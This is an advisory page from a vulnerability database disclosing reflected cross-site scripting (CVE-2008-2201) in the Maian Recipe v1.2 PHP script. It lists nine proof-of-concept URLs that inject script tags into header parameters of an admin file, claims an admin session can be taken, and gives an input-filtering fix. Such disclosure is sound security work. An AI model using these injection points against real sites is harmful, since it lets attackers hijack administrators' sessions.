Bug: Maian Recipe v1.2 Xss Vulnerabilities ( Ascii Version )

Search:
WLB2

Maian Recipe v1.2 Xss Vulnerabilities

Published
Credit
Risk
2008.05.15
Khashayar Fereidani Or Dr.Crash
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2008-2201
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

----------------------------------------------------------------

Script : Maian Recipe v1.2

Type : Xss Vulnerabilities

----------------------------------------------------------------

Discovered by : �Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH

----------------------------------------------------------------

Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM

----------------------------------------------------------------

IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr

----------------------------------------------------------------

Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html

----------------------------------------------------------------

XSS 1 : http://Example/admin/inc/header.php?header=</title><script>alert('xss')<
/script>

XSS 2 : http://Example/admin/inc/header.php?header2="<script>alert('xss')</scrip
t>

XSS 3 : http://Example/admin/inc/header.php?header3="<script>alert('xss')</scrip
t>

XSS 4 : http://Example/admin/inc/header.php?header4="<script>alert('xss')</scrip
t>

XSS 5 : http://Example/admin/inc/header.php?header5="<script>alert('xss')</scrip
t>

XSS 6 : http://Example/admin/inc/header.php?header6="<script>alert('xss')</scrip
t>

XSS 7 : http://Example/admin/inc/header.php?header7="<script>alert('xss')</scrip
t>

XSS 8 : http://Example/admin/inc/header.php?header8="<script>alert('xss')</scrip
t>

XSS 9 : http://Example/admin/inc/header.php?header9="<script>alert('xss')</scrip
t>

You Can Get Admin Session With This Vuln ....

----------------------------------------------------------------

Solution : Edit Source Code And Filter Variable With htmlspecialchar() function .......

----------------------------------------------------------------

TNx : God......

Khashayar Fereidani Email : irancrash[at]gmail[dot]com

----------------------------------------------------------------

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version